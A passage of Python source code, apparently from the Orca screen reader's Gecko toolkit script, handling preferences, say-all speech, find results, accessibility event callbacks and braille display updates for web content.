prefs.writelines("%s.onlySpeakChangedLinesDuringFind = %s\n"\
% (prefix, value))
script_settings.onlySpeakChangedLinesDuringFind = value
value = self.minimumFindLengthSpinButton.get_value()
prefs.writelines("%s.minimumFindLength = %s\n" % (prefix, value))
script_settings.minimumFindLength = value
# These structural navigation settings used to be application-
# specific preferences because at the time structural navigation
# was implemented it was part of the Gecko script. These settings
# are now part of settings.py so that other scripts can implement
# structural navigation. But until that happens, there's no need
# to move these controls/change the preferences dialog.
#
value = self.speakCellCoordinatesCheckButton.get_active()
prefs.writelines("orca.settings.speakCellCoordinates = %s\n" % value)
_settingsManager.setSetting('speakCellCoordinates', value)
value = self.speakCellSpanCheckButton.get_active()
prefs.writelines("orca.settings.speakCellSpan = %s\n" % value)
_settingsManager.setSetting('speakCellSpan', value)
value = self.speakCellHeadersCheckButton.get_active()
prefs.writelines("orca.settings.speakCellHeaders = %s\n" % value)
_settingsManager.setSetting('speakCellHeaders', value)
value = self.skipBlankCellsCheckButton.get_active()
prefs.writelines("orca.settings.skipBlankCells = %s\n" % value)
_settingsManager.setSetting('skipBlankCells', value)
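# For illustration (values hypothetical), the lines written to the user's
# preferences file look like:
#   import orca.scripts.toolkits.Gecko.script_settings
#   orca.scripts.toolkits.Gecko.script_settings.controlCaretNavigation = True
#   orca.settings.speakCellCoordinates = False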
def getAppState(self):
"""Returns an object that can be passed to setAppState. This
object will be used by setAppState to restore any state information
that was being maintained by the script."""
return [default.Script.getAppState(self),
self._documentFrameCaretContext]
def setAppState(self, appState):
"""Sets the application state using the given appState object.
Arguments:
- appState: an object obtained from getAppState
"""
try:
[defaultAppState,
self._documentFrameCaretContext] = appState
default.Script.setAppState(self, defaultAppState)
except:
debug.printException(debug.LEVEL_WARNING)
def consumesKeyboardEvent(self, keyboardEvent):
"""Called when a key is pressed on the keyboard.
Arguments:
- keyboardEvent: an instance of input_event.KeyboardEvent
Returns True if the event is of interest.
"""
# We need to do this here. Orca caret and structural navigation
# often result in the user being repositioned without our getting
# a corresponding AT-SPI event. Without an AT-SPI event, script.py
# won't know to dump the generator cache. See bgo#618827.
#
self.generatorCache = {}
# The reason we override this method is that we only want
# to consume keystrokes under certain conditions. For
# example, we only control the arrow keys when we're
# managing caret navigation and we're inside document content.
#
# [[[TODO: WDW - this might be broken when we're inside a
# text area that's inside document (or anything else that
# we want to allow to control its own destiny).]]]
user_bindings = None
user_bindings_map = _settingsManager.getSetting('keyBindingsMap')
if self.__module__ in user_bindings_map:
user_bindings = user_bindings_map[self.__module__]
elif "default" in user_bindings_map:
user_bindings = user_bindings_map["default"]
consumes = False
if user_bindings:
handler = user_bindings.getInputHandler(keyboardEvent)
if handler and handler.function in self._caretNavigationFunctions:
return self.useCaretNavigationModel(keyboardEvent)
elif handler \
and (handler.function in self.structuralNavigation.functions \
or handler.function in self._liveRegionFunctions):
return self.useStructuralNavigationModel()
else:
consumes = handler is not None
if not consumes:
handler = self.keyBindings.getInputHandler(keyboardEvent)
if handler and handler.function in self._caretNavigationFunctions:
return self.useCaretNavigationModel(keyboardEvent)
elif handler \
and (handler.function in self.structuralNavigation.functions \
or handler.function in self._liveRegionFunctions):
return self.useStructuralNavigationModel()
else:
consumes = handler is not None
return consumes
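# In short: caret navigation keys are consumed only when
# useCaretNavigationModel() says Orca is driving the caret; structural
# navigation and live region keys are consumed only when
# useStructuralNavigationModel() allows it; any other keystroke is consumed
# iff some handler is bound to it.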
def textLines(self, obj):
"""Creates a generator that can be used to iterate over each line
of a text object, starting at the caret offset.
Arguments:
- obj: an Accessible that has a text specialization
Returns an iterator that produces elements of the form:
[SayAllContext, acss], where SayAllContext has the text to be
spoken and acss is an ACSS instance for speaking the text.
"""
# Determine the correct "say all by" mode to use.
#
sayAllStyle = _settingsManager.getSetting('sayAllStyle')
sayAllBySentence = sayAllStyle == settings.SAYALL_STYLE_SENTENCE
[obj, characterOffset] = self.getCaretContext()
if sayAllBySentence:
# Attempt to locate the start of the current sentence by
# searching to the left for a sentence terminator. If we don't
# find one, or if the "say all by" mode is not sentence, we'll
# just start the sayAll at the beginning of this line/object.
#
text = self.utilities.queryNonEmptyText(obj)
if text:
[line, startOffset, endOffset] = \
text.getTextAtOffset(characterOffset,
pyatspi.TEXT_BOUNDARY_LINE_START)
beginAt = 0
if line.strip():
terminators = ['. ', '? ', '! ']
for terminator in terminators:
try:
index = line.rindex(terminator,
0,
characterOffset - startOffset)
if index > beginAt:
beginAt = index
except:
pass
characterOffset = startOffset + beginAt
else:
[obj, characterOffset] = \
self.findNextCaretInOrder(obj, characterOffset)
done = False
while not done:
if sayAllBySentence:
contents = self.getObjectContentsAtOffset(obj, characterOffset)
else:
contents = self.getLineContentsAtOffset(obj, characterOffset)
utterances = self.getUtterancesFromContents(contents)
clumped = self.clumpUtterances(utterances)
for i in range(len(clumped)):
[obj, startOffset, endOffset, text] = \
contents[min(i, len(contents)-1)]
[element, voice] = clumped[i]
if isinstance(element, str):
element = self.utilities.adjustForRepeats(element)
if isinstance(element, (Pause, ACSS)):
# At the moment, SayAllContext is expecting a string, not
# a Pause. For now, being conservative and catching that
# here. See bug #591351.
#
continue
yield [speechserver.SayAllContext(obj, element,
startOffset, endOffset),
voice]
obj = contents[-1][0]
characterOffset = max(0, contents[-1][2] - 1)
if sayAllBySentence:
[obj, characterOffset] = \
self.findNextCaretInOrder(obj, characterOffset)
else:
[obj, characterOffset] = \
self.findNextLine(obj, characterOffset)
done = (obj is None)
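# Sketch of what this generator yields (values hypothetical): each item has
# the form [SayAllContext(obj, "Some line of text", 0, 18), acss]; speech's
# sayAll() consumes these one clump at a time, invoking the progress callback
# below as it goes.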
def __sayAllProgressCallback(self, context, callbackType):
if callbackType == speechserver.SayAllContext.PROGRESS:
#print "PROGRESS", context.utterance, context.currentOffset
#
# Attempt to keep the content visible on the screen as
# it is being read, but avoid links as grabFocus sometimes
# makes them disappear and causes sayAll to subsequently stop.
#
if context.currentOffset == 0 and \
context.obj.getRole() in [pyatspi.ROLE_HEADING,
pyatspi.ROLE_SECTION,
pyatspi.ROLE_PARAGRAPH] \
and context.obj.parent.getRole() != pyatspi.ROLE_LINK:
characterCount = context.obj.queryText().characterCount
self.setCaretPosition(context.obj, characterCount-1)
elif callbackType == speechserver.SayAllContext.INTERRUPTED:
#print "INTERRUPTED", context.utterance, context.currentOffset
try:
self.setCaretPosition(context.obj, context.currentOffset)
except:
characterCount = context.obj.queryText().characterCount
self.setCaretPosition(context.obj, characterCount-1)
self.updateBraille(context.obj)
elif callbackType == speechserver.SayAllContext.COMPLETED:
#print "COMPLETED", context.utterance, context.currentOffset
try:
self.setCaretPosition(context.obj, context.currentOffset)
except:
characterCount = context.obj.queryText().characterCount
self.setCaretPosition(context.obj, characterCount-1)
self.updateBraille(context.obj)
def presentFindResults(self, obj, offset):
"""Updates the caret context to the match indicated by obj and
offset. Then presents the results according to the user's
preferences.
Arguments:
-obj: The accessible object within the document
-offset: The offset within obj where the caret should be positioned
"""
# At some point in Firefox 3.2 we started getting detail1 values of
# -1 for the caret-moved events for unfocused content during a find.
# We don't want to base the new caret offset -- or the current line
# on this value. We should be able to count on the selection range
# instead -- across FF 3.0, 3.1, and 3.2.
#
enoughSelected = False
text = self.utilities.queryNonEmptyText(obj)
if text and text.getNSelections():
[start, end] = text.getSelection(0)
offset = max(offset, start)
if end - start >= script_settings.minimumFindLength:
enoughSelected = True
# Having done that, update the caretContext. If the user wants
# matches spoken, we also need to know if we are on the same line
# as before.
#
origObj, origOffset = self.getCaretContext()
self.setCaretContext(obj, offset)
if enoughSelected and script_settings.speakResultsDuringFind:
origExtents = self.getExtents(origObj, origOffset - 1, origOffset)
newExtents = self.getExtents(obj, offset - 1, offset)
lineChanged = not self.onSameLine(origExtents, newExtents)
# If the user starts backspacing over the text in the
# toolbar entry, he/she is indicating they want to perform
# a different search. Because madeFindAnnouncement may
# be set to True, we should reset it -- but only if we
# detect the line has also changed. We're not getting
# events from the Find entry, so we have to compare
# offsets.
#
if self.utilities.isSameObject(origObj, obj) \
and (origOffset > offset) and lineChanged:
self.madeFindAnnouncement = False
if lineChanged or not self.madeFindAnnouncement or \
not script_settings.onlySpeakChangedLinesDuringFind:
self.presentLine(obj, offset)
self.madeFindAnnouncement = True
def sayAll(self, inputEvent):
"""Speaks the contents of the document beginning with the present
location. Overridden in this script because the sayAll could have
been started on an object without text (such as an image).
"""
if not self.inDocumentContent():
return default.Script.sayAll(self, inputEvent)
else:
speech.sayAll(self.textLines(orca_state.locusOfFocus),
self.__sayAllProgressCallback)
return True
def onCaretMoved(self, event):
"""Callback for object:text-caret-moved accessibility events."""
text = self.utilities.queryNonEmptyText(event.source)
if not text:
if event.source.getRole() == pyatspi.ROLE_LINK:
orca.setLocusOfFocus(event, event.source)
return
contextObj, contextOffset = self.getCaretContext()
if event.detail1 == contextOffset and event.source == contextObj:
return
obj = event.source
firstObj, firstOffset = self.findFirstCaretContext(obj, event.detail1)
if firstOffset == contextOffset and firstObj == contextObj:
return
if contextObj and contextObj.parent == firstObj:
return
if self.isAriaWidget(obj) or not self.inDocumentContent(obj):
default.Script.onCaretMoved(self, event)
return
if self.utilities.inFindToolbar():
self.presentFindResults(obj, event.detail1)
return
self.setCaretContext(obj, event.detail1)
if not script_settings.controlCaretNavigation \
or obj.getState().contains(pyatspi.STATE_EDITABLE):
orca.setLocusOfFocus(event, obj, False)
default.Script.onCaretMoved(self, event)
def onTextDeleted(self, event):
"""Called whenever text is from an an object.
Arguments:
- event: the Event
"""
self._destroyLineCache()
if not event.source.getState().contains(pyatspi.STATE_EDITABLE):
if self.inMouseOverObject:
obj = self.lastMouseOverObject
while obj and (obj != obj.parent):
if self.utilities.isSameObject(event.source, obj):
self.restorePreMouseOverContext()
break
obj = obj.parent
default.Script.onTextDeleted(self, event)
def onTextInserted(self, event):
"""Called whenever text is inserted into an object.
Arguments:
- event: the Event
"""
self._destroyLineCache()
if self.handleAsLiveRegion(event):
self.liveMngr.handleEvent(event)
return
default.Script.onTextInserted(self, event)
def _getCtrlShiftSelectionsStrings(self):
return [messages.LINE_SELECTED_DOWN,
messages.LINE_UNSELECTED_DOWN,
messages.LINE_SELECTED_UP,
messages.LINE_UNSELECTED_UP]
def onTextSelectionChanged(self, event):
"""Called when an object's text selection changes.
Arguments:
- event: the Event
"""
if self.utilities.inFindToolbar():
self.presentFindResults(event.source, -1)
return
if not self.inDocumentContent(orca_state.locusOfFocus) \
and self.inDocumentContent(event.source):
return
default.Script.onTextSelectionChanged(self, event)
def onActiveChanged(self, event):
"""Callback for object:state-changed:active accessibility events."""
if self.findCommandRun:
self.findCommandRun = False
self.find()
return
if not event.detail1:
return
role = event.source.getRole()
if role in [pyatspi.ROLE_DIALOG, pyatspi.ROLE_ALERT]:
orca.setLocusOfFocus(event, event.source)
def onBusyChanged(self, event):
"""Callback for object:state-changed:busy accessibility events."""
try:
obj = event.source
role = obj.getRole()
name = obj.name
except:
return
if role != pyatspi.ROLE_DOCUMENT_FRAME:
return
if self.isAriaWidget(obj.parent):
return
try:
focusRole = orca_state.locusOfFocus.getRole()
except:
focusRole = None
# The event is for the changing contents of the help frame as the user
# navigates from topic to topic in the list on the left. Ignore this.
if focusRole == pyatspi.ROLE_LIST_ITEM \
and not self.inDocumentContent(orca_state.locusOfFocus):
return
finishedLoading = False
if event.detail1:
self._loadingDocumentContent = True
message = messages.PAGE_LOADING_START
elif name:
message = messages.PAGE_LOADING_END_NAMED % name
finishedLoading = True
else:
message = messages.PAGE_LOADING_END
finishedLoading = True
if not _settingsManager.getSetting('onlySpeakDisplayedText'):
self.presentMessage(message)
if not finishedLoading:
return
# Store the document frame; otherwise, the first time it gains focus (e.g.
# the first time the user arrows off of a link into non-focusable text),
# onFocused will start chatting unnecessarily.
self._currentFrame = obj
# First try to figure out where the caret is on the newly loaded page.
# If it is on an editable object (e.g., a text entry), then present just
# that object. Otherwise, force the caret to the top of the page and
# start a SayAll from that position.
[obj, characterOffset] = self.getCaretContext()
atTop = False
if not obj:
self.clearCaretContext()
[obj, characterOffset] = self.getCaretContext()
atTop = True
if not obj:
return
if not atTop and not obj.getState().contains(pyatspi.STATE_FOCUSABLE):
self.clearCaretContext()
[obj, characterOffset] = self.getCaretContext()
if not obj:
return
# For braille, we just show the current line containing the caret. For
# speech, however, we will start a Say All operation if the caret is in
# an unfocusable area (e.g., it's not in a text entry area such as
# Google's search text entry or a link that we just returned to by
# pressing the back button). Otherwise, we'll just speak the line that
# the caret is on.
self.updateBraille(obj)
if obj.getState().contains(pyatspi.STATE_FOCUSABLE):
speech.speak(self.speechGenerator.generateSpeech(obj))
elif not script_settings.sayAllOnLoad:
self.speakContents(
self.getLineContentsAtOffset(obj, characterOffset))
elif _settingsManager.getSetting('enableSpeech'):
self.sayAll(None)
def onChildrenChanged(self, event):
"""Callback for object:children-changed accessibility events."""
if event.any_data is None:
return
if not event.type.startswith("object:children-changed:add"):
return
if self.handleAsLiveRegion(event):
self.liveMngr.handleEvent(event)
return
child = event.any_data
try:
childRole = child.getRole()
except:
return
if childRole == pyatspi.ROLE_ALERT:
orca.setLocusOfFocus(event, child)
return
if childRole == pyatspi.ROLE_DIALOG:
if self.isAriaWidget(event.source):
orca.setLocusOfFocus(event, child)
return
if self.lastMouseRoutingTime \
and 0 < time.time() - self.lastMouseRoutingTime < 1:
utterances = []
utterances.append(messages.NEW_ITEM_ADDED)
utterances.extend(
self.speechGenerator.generateSpeech(child, force=True))
speech.speak(utterances)
self.lastMouseOverObject = child
self.preMouseOverContext = self.getCaretContext()
return
default.Script.onChildrenChanged(self, event)
def onDocumentReload(self, event):
"""Callback for document:reload accessibility events."""
# We care about the main document and we'll ignore document
# events from HTML iframes.
#
if event.source.getRole() == pyatspi.ROLE_DOCUMENT_FRAME:
self._loadingDocumentContent = True
def onDocumentLoadComplete(self, event):
"""Callback for document:load-complete accessibility events."""
# We care about the main document and we'll ignore document
# events from HTML iframes.
#
if event.source.getRole() == pyatspi.ROLE_DOCUMENT_FRAME:
# Reset the live region manager.
self.liveMngr.reset()
self._loadingDocumentContent = False
self._loadingDocumentTime = time.time()
def onDocumentLoadStopped(self, event):
"""Callback for document:load-stopped accessibility events."""
# We care about the main document and we'll ignore document
# events from HTML iframes.
#
if event.source.getRole() == pyatspi.ROLE_DOCUMENT_FRAME:
self._loadingDocumentContent = False
self._loadingDocumentTime = time.time()
def onNameChanged(self, event):
"""Called whenever a property on an object changes.
Arguments:
- event: the Event
"""
if event.source.getRole() == pyatspi.ROLE_FRAME:
self.liveMngr.flushMessages()
def onFocus(self, event):
"""Callback for focus: accessibility events."""
# NOTE: This event type is deprecated and Orca should no longer use it.
# This callback remains just to handle bugs in applications and toolkits
# during the remainder of the unstable (3.11) development cycle.
role = event.source.getRole()
# Unfiled. When a context menu pops up, we seem to get a focus: event,
# but no object:state-changed:focused event from Gecko.
if role == pyatspi.ROLE_MENU:
orca.setLocusOfFocus(event, event.source)
return
# Unfiled. When the Thunderbird 'do you want to replace this file'
# attachment dialog pops up, the 'Replace' button emits a focus:
# event, but we only seem to get the object:state-changed:focused
# event when it gives up focus.
if role == pyatspi.ROLE_PUSH_BUTTON:
orca.setLocusOfFocus(event, event.source)
# Some of the dialogs used by Thunderbird (and perhaps Firefox?) seem
# to be using Gtk+ 2, along with its associated focused-event issues.
# Unfortunately, because Gtk+ 2 doesn't expose a per-object toolkit,
# we cannot know that a given widget is Gtk+ 2. Therefore, we'll put
# our Gtk+ 2 toolkit script hacks here as well just to be safe.
if role in [pyatspi.ROLE_TEXT, pyatspi.ROLE_PASSWORD_TEXT]:
orca.setLocusOfFocus(event, event.source)
def onFocusedChanged(self, event):
"""Callback for object:state-changed:focused accessibility events."""
if not event.detail1:
return
if not script_settings.controlCaretNavigation:
default.Script.onFocusedChanged(self, event)
return
obj = event.source
if self.isAriaWidget(obj) or not self.inDocumentContent(obj):
default.Script.onFocusedChanged(self, event)
return
state = obj.getState()
if state.contains(pyatspi.STATE_EDITABLE):
default.Script.onFocusedChanged(self, event)
return
role = obj.getRole()
if role in [pyatspi.ROLE_DIALOG, pyatspi.ROLE_ALERT]:
orca.setLocusOfFocus(event, event.source)
return
# As the caret moves into a non-focusable element, Gecko emits the
# signal on the first focusable element in the ancestry.
rolesToIgnore = pyatspi.ROLE_DOCUMENT_FRAME, pyatspi.ROLE_PANEL
if role in rolesToIgnore:
if self.inDocumentContent():
return
contextObj, contextOffset = self.getCaretContext()
if contextObj:
orca.setLocusOfFocus(event, contextObj)
return
default.Script.onFocusedChanged(self, event)
def onShowingChanged(self, event):
"""Callback for object:state-changed:showing accessibility events."""
# TODO - JD: Once there are separate scripts for the Gecko toolkit
# and the Firefox browser, the stuff below belongs in the browser
# script and not in the toolkit script.
try:
eventRole = event.source.getRole()
focusedRole = orca_state.locusOfFocus.getRole()
except:
default.Script.onShowingChanged(self, event)
return
# If an autocomplete appears beneath an entry, we don't want
# to prevent the user from being able to arrow into it.
if eventRole == pyatspi.ROLE_WINDOW \
and focusedRole in [pyatspi.ROLE_ENTRY, pyatspi.ROLE_LIST_ITEM]:
self._autocompleteVisible = event.detail1
# If the autocomplete has just appeared, we want to speak
# its appearance if the user's verbosity level is verbose
# or if the user forced it to appear with (Alt+)Down Arrow.
if self._autocompleteVisible:
level = _settingsManager.getSetting('speechVerbosityLevel')
speakIt = level == settings.VERBOSITY_LEVEL_VERBOSE
if not speakIt:
eventString, mods = self.utilities.lastKeyAndModifiers()
speakIt = eventString == "Down"
if speakIt:
speech.speak(self.speechGenerator.getLocalizedRoleName(
event.source, pyatspi.ROLE_AUTOCOMPLETE))
return
default.Script.onShowingChanged(self, event)
def handleProgressBarUpdate(self, event, obj):
"""Determine whether this progress bar event should be spoken or not.
For Firefox, we don't want to speak the small "page load" progress
bar. All other Firefox progress bars get passed onto the parent
class for handling.
Arguments:
- event: if not None, the Event that caused this to happen
- obj: the Accessible progress bar object.
"""
rolesList = [pyatspi.ROLE_PROGRESS_BAR, \
pyatspi.ROLE_STATUS_BAR, \
pyatspi.ROLE_FRAME, \
pyatspi.ROLE_APPLICATION]
if not self.utilities.hasMatchingHierarchy(event.source, rolesList):
default.Script.handleProgressBarUpdate(self, event, obj)
def locusOfFocusChanged(self, event, oldFocus, newFocus):
"""Called when the object with focus changes.
Arguments:
- event: if not None, the Event that caused the change
- oldFocus: Accessible that is the old focus
- newFocus: Accessible that is the new focus
"""
if not newFocus:
orca_state.noFocusTimeStamp = time.time()
return
if self.utilities.inFindToolbar(newFocus):
self.madeFindAnnouncement = False
if not self.inDocumentContent(newFocus):
default.Script.locusOfFocusChanged(self, event, oldFocus, newFocus)
return
caretOffset = -1
if self.utilities.inFindToolbar(oldFocus):
newFocus, caretOffset = self.getCaretContext()
text = self.utilities.queryNonEmptyText(newFocus)
if text and (0 <= text.caretOffset < text.characterCount):
caretOffset = text.caretOffset
self.setCaretContext(newFocus, caretOffset)
default.Script.locusOfFocusChanged(self, event, oldFocus, newFocus)
def findObjectOnLine(self, obj, offset, contents):
"""Determines if the item described by the object and offset is
in the line contents.
Arguments:
- obj: the Accessible
- offset: the character offset within obj
- contents: a list of (obj, startOffset, endOffset, string) tuples
Returns the index of the item if found; -1 if not found.
"""
if not obj or not contents or not len(contents):
return -1
index = -1
for content in contents:
[candidate, start, end, string] = content
# When we get the line contents, we include a focusable list
# as a list and combo box as a combo box because that is what
# we want to present. However, when we set the caret context,
# we set it to the position (and object) that immediately
# precedes it. Therefore, that's what we need to look at when
# trying to determine our position.
#
try:
role = candidate.getRole()
except (LookupError, RuntimeError):
role = None
try:
state = candidate.getState()
except (LookupError, RuntimeError):
state = pyatspi.StateSet()
if role in [pyatspi.ROLE_LIST, pyatspi.ROLE_COMBO_BOX] \
and state.contains(pyatspi.STATE_FOCUSABLE) \
and not self.utilities.isSameObject(obj, candidate):
start = self.utilities.characterOffsetInParent(candidate)
end = start + 1
candidate = candidate.parent
if self.utilities.isSameObject(obj, candidate) \
and (start <= offset < end or role == pyatspi.ROLE_ENTRY):
index = contents.index(content)
break
return index
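# Example (data hypothetical): with contents = [(para, 0, 12, "Hello world "),
# (link, 0, 4, "more")], findObjectOnLine(link, 2, contents) returns 1 because
# offset 2 falls inside the link's [0, 4) range on that line.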
def _updateLineCache(self, obj, offset):
"""Tries to intelligently update our stored lines. Destroying them if
need be.
Arguments:
- obj: the Accessible
- offset: the character offset within obj
"""
index = self.findObjectOnLine(obj, offset, self.currentLineContents)
if index < 0:
index = self.findObjectOnLine(obj,
offset,
self._previousLineContents)
if index >= 0:
self._nextLineContents = self.currentLineContents
self.currentLineContents = self._previousLineContents
self._previousLineContents = None
else:
index = self.findObjectOnLine(obj,
offset,
self._nextLineContents)
if index >= 0:
self._previousLineContents = self.currentLineContents
self.currentLineContents = self._nextLineContents
self._nextLineContents = None
else:
self._destroyLineCache()
def _destroyLineCache(self):
"""Removes all of the stored lines."""
self._previousLineContents = None
self.currentLineContents = None
self._nextLineContents = None
self.currentAttrs = {}
def presentLine(self, obj, offset):
"""Presents the current line in speech and in braille.
Arguments:
- obj: the Accessible at the caret
- offset: the offset within obj
"""
contents = self.currentLineContents
index = self.findObjectOnLine(obj, offset, contents)
if index < 0:
self.currentLineContents = self.getLineContentsAtOffset(obj,
offset)
if not isinstance(orca_state.lastInputEvent, input_event.BrailleEvent):
self.speakContents(self.currentLineContents)
self.updateBraille(obj)
def updateBraille(self, obj, extraRegion=None):
"""Updates the braille display to show the given object.
Arguments:
- obj: the Accessible
- extra: extra Region to add to the end
"""
if not _settingsManager.getSetting('enableBraille') \
and not _settingsManager.getSetting('enableBrailleMonitor'):
debug.println(debug.LEVEL_INFO, "BRAILLE: update disabled")
return
if self.isAriaWidget(obj) or not self.inDocumentContent():
default.Script.updateBraille(self, obj, extraRegion)
return
if not obj:
return
line = self.getNewBrailleLine(clearBraille=True, addLine=True)
# Some text areas have a character offset of -1 when you tab
# into them. In these cases, they show all the text as being
# selected. We don't know quite what to do in that case,
# so we'll just pretend the caret is at the beginning (0).
#
[focusedObj, focusedCharacterOffset] = self.getCaretContext()
# [[[TODO: HACK - WDW when composing e-mail in Thunderbird and
# when entering text in editable text areas, Gecko likes to
# force the last character of a line to be a newline. So,
# we adjust for this because we want to keep meaningful text
# on the display.]]]
#
needToRefresh = False
lineContentsOffset = focusedCharacterOffset
focusedObjText = self.utilities.queryNonEmptyText(focusedObj)
if focusedObjText:
char = focusedObjText.getText(focusedCharacterOffset,
focusedCharacterOffset + 1)
if char == "\n":
lineContentsOffset = max(0, focusedCharacterOffset - 1)
needToRefresh = True
if not self.isNavigableAria(focusedObj):
# Sometimes looking for the first caret context means that we
# are on a child within a non-navigable object (such as the
# text within a page tab). If so, set the focusedObj to the
# parent widget.
#
if not self.isAriaWidget(focusedObj):
focusedObj, focusedCharacterOffset = focusedObj.parent, 0
lineContentsOffset = 0
# Sometimes we just want to present the current object rather
# than the full line. For instance, if we're on a slider we
# should just present that slider. We'll assume we want the
# full line, however.
#
presentOnlyFocusedObj = False
if focusedObj and focusedObj.getRole() == pyatspi.ROLE_SLIDER:
presentOnlyFocusedObj = True
contents = self.currentLineContents
index = self.findObjectOnLine(focusedObj,
max(0, lineContentsOffset),
contents)
if index < 0 or needToRefresh:
contents = self.getLineContentsAtOffset(focusedObj,
max(0, lineContentsOffset))
self.currentLineContents = contents
index = self.findObjectOnLine(focusedObj,
max(0, lineContentsOffset),
contents)
if not len(contents):
return
whitespace = [" ", "\n", self.NO_BREAK_SPACE_CHARACTER]
focusedRegion = None
for i, content in enumerate(contents):
isFocusedObj = (i == index)
[obj, startOffset, endOffset, string] = content
if not obj:
continue
elif presentOnlyFocusedObj and not isFocusedObj:
continue
role = obj.getRole()
if (not len(string) and role != pyatspi.ROLE_PARAGRAPH) \
or self.utilities.isEntry(obj) \
or self.utilities.isPasswordText(obj) \
or role in [pyatspi.ROLE_LINK, pyatspi.ROLE_PUSH_BUTTON]:
[regions, fRegion] = \
self.brailleGenerator.generateBraille(obj)
if isFocusedObj:
focusedRegion = fRegion
else:
regions = [self.getNewBrailleText(obj,
startOffset=startOffset,
endOffset=endOffset)]
if role == pyatspi.ROLE_CAPTION:
regions.append(self.getNewBrailleRegion(
" " + self.brailleGenerator.getLocalizedRoleName(obj)))
if isFocusedObj:
focusedRegion = regions[0]
# We only want to display the heading role and level if we
# have found the final item in that heading, or if that
# heading contains no children.
#
isLastObject = (i == len(contents) - 1)
if role == pyatspi.ROLE_HEADING \
and (isLastObject or not obj.childCount):
heading = obj
elif isLastObject:
heading = self.utilities.ancestorWithRole(
obj, [pyatspi.ROLE_HEADING], [pyatspi.ROLE_DOCUMENT_FRAME])
else:
heading = None
if heading:
level = self.getHeadingLevel(heading)
headingString = \
object_properties.ROLE_HEADING_LEVEL_BRAILLE % level
if not string.endswith(" "):
headingString = " " + headingString
if not isLastObject:
headingString += " "
regions.append(self.getNewBrailleRegion((headingString)))
# Add whitespace if we need it. [[[TODO: JD - But should we be
# doing this in the braille generators rather than here??]]]
#
if regions and len(line.regions) \
and regions[0].string and line.regions[-1].string \
and not regions[0].string[0] in whitespace \
and not line.regions[-1].string[-1] in whitespace:
# There is nothing separating the previous braille region from
# this one. We might or might not want to add some whitespace
# for readability.
#
lastObj = contents[i - 1][0]
# If we have two of the same braille class, or if the previous
# region is a component or a generic region, or an image link,
# we should add some space.
#
if line.regions[-1].__class__ == regions[0].__class__ \
or line.regions[-1].__class__ in [braille.Component,
braille.Region] \
or lastObj.getRole() == pyatspi.ROLE_IMAGE \
or obj.getRole() == pyatspi.ROLE_IMAGE:
self.addToLineAsBrailleRegion(" ", line)
# The above check will catch table cells with uniform
# contents and form fields -- and do so more efficiently
# than walking up the hierarchy. But if we have a cell
# with text next to a cell with a link.... Ditto for
# sections on the same line.
#
else:
layoutRoles = [pyatspi.ROLE_TABLE_CELL,
pyatspi.ROLE_SECTION,
pyatspi.ROLE_LIST_ITEM]
if role in layoutRoles:
acc1 = obj
else:
acc1 = self.utilities.ancestorWithRole(
obj, layoutRoles, [pyatspi.ROLE_DOCUMENT_FRAME])
if acc1:
if lastObj.getRole() == acc1.getRole():
acc2 = lastObj
else:
acc2 = self.utilities.ancestorWithRole(
lastObj,
layoutRoles,
[pyatspi.ROLE_DOCUMENT_FRAME])
if not self.utilities.isSameObject(acc1, acc2):
self.addToLineAsBrailleRegion(" ", line)
self.addBrailleRegionsToLine(regions, line)
if isLastObject:
line.regions[-1].string = line.regions[-1].string.rstrip(" ")
# If we're inside of a combo box, we only want to display
# the selected menu item.
#
if obj.getRole() == pyatspi.ROLE_MENU_ITEM \
and obj.getState().contains(pyatspi.STATE_FOCUSED):
break
if extraRegion:
self.addBrailleRegionToLine(extraRegion, line)
self.setBrailleFocus(focusedRegion, getLinkMask=False)
self.refreshBraille(panToCursor=True, getLinkMask=False)
def sayCharacter(self, obj):
"""Speaks the character at the current caret position."""
# We need to handle HTML content differently because of the
# EMBEDDED_OBJECT_CHARACTER model of Gecko. For all other
# things, however, we can defer to the default scripts.
#
if not self.inDocumentContent() or self.utilities.isEntry(obj):
default.Script.sayCharacter(self, obj)
return
[obj, characterOffset] = self.getCaretContext()
text = self.utilities.queryNonEmptyText(obj)
if text:
# If the caret is at the end of text and we're not in an
# entry, something bad is going on, so decrement the offset
# before speaking the character.
#
string = text.getText(0, -1)
if characterOffset >= len(string) \
and not obj.getState().contains(pyatspi.STATE_EDITABLE):
print("YIKES in Gecko.sayCharacter!")
characterOffset -= 1
if characterOffset >= 0:
self.speakCharacterAtOffset(obj, characterOffset)
def sayWord(self, obj):
"""Speaks the word at the current caret position."""
# We need to handle HTML content differently because of the
# EMBEDDED_OBJECT_CHARACTER model of Gecko. For all other
# things, however, we can defer to the default scripts.
#
if not self.inDocumentContent():
default.Script.sayWord(self, obj)
return
[obj, characterOffset] = self.getCaretContext()
text = self.utilities.queryNonEmptyText(obj)
if text:
# [[[TODO: WDW - the caret might be at the end of the text.
# Not quite sure what to do in this case. What we'll do here
# is just speak the previous word. But...maybe we want to
# make sure we say something like "end of line" or move the
# caret context to the beginning of the next word via
# a call to goNextWord.]]]
#
string = text.getText(0, -1)
if characterOffset >= len(string) \
and not obj.getState().contains(pyatspi.STATE_EDITABLE):
print("YIKES in Gecko.sayWord!")
characterOffset -= 1
# Ideally in an entry we would just let default.sayWord() handle
# things. That fails to work when navigating backwards by word.
# Because getUtterancesFromContents() now uses the speech_generator
# with entries, we need to handle word navigation in entries here.
#
wordContents = self.getWordContentsAtOffset(obj, characterOffset)
[textObj, startOffset, endOffset, word] = wordContents[0]
self.speakMisspelledIndicator(textObj, startOffset)
if not self.utilities.isEntry(textObj):
self.speakContents(wordContents)
else:
word = self.utilities.substring(textObj, startOffset, endOffset)
speech.speak([word], self.getACSS(textObj, word))
def sayLine(self, obj):
"""Speaks the line at the current caret position."""
# We need to handle HTML content differently because of the
# EMBEDDED_OBJECT_CHARACTER model of Gecko. For all other
# things, however, we can defer to the default scripts.
#
if not self.inDocumentContent() or self.utilities.isEntry(obj):
default.Script.sayLine(self, obj)
return
[obj, characterOffset] = self.getCaretContext()
text = self.utilities.queryNonEmptyText(obj)
if text:
# [[[TODO: WDW - the caret might be at the end of the text.
# Not quite sure what to do in this case. What we'll do here
# is just speak the current line. But...maybe we want to
# make sure we say something like "end of line" or move the
# caret context to the beginning of the next line via
# a call to goNextLine.]]]
#
string = text.getText(0, -1)
if characterOffset >= len(string) \
and not obj.getState().contains(pyatspi.STATE_EDITABLE):
print("YIKES in Gecko.sayLine!")
characterOffset -= 1
self.speakContents(self.getLineContentsAtOffset(obj, characterOffset))
def panBrailleLeft(self, inputEvent=None, panAmount=0):
"""In document content, we want to use the panning keys to browse the
entire document.
"""
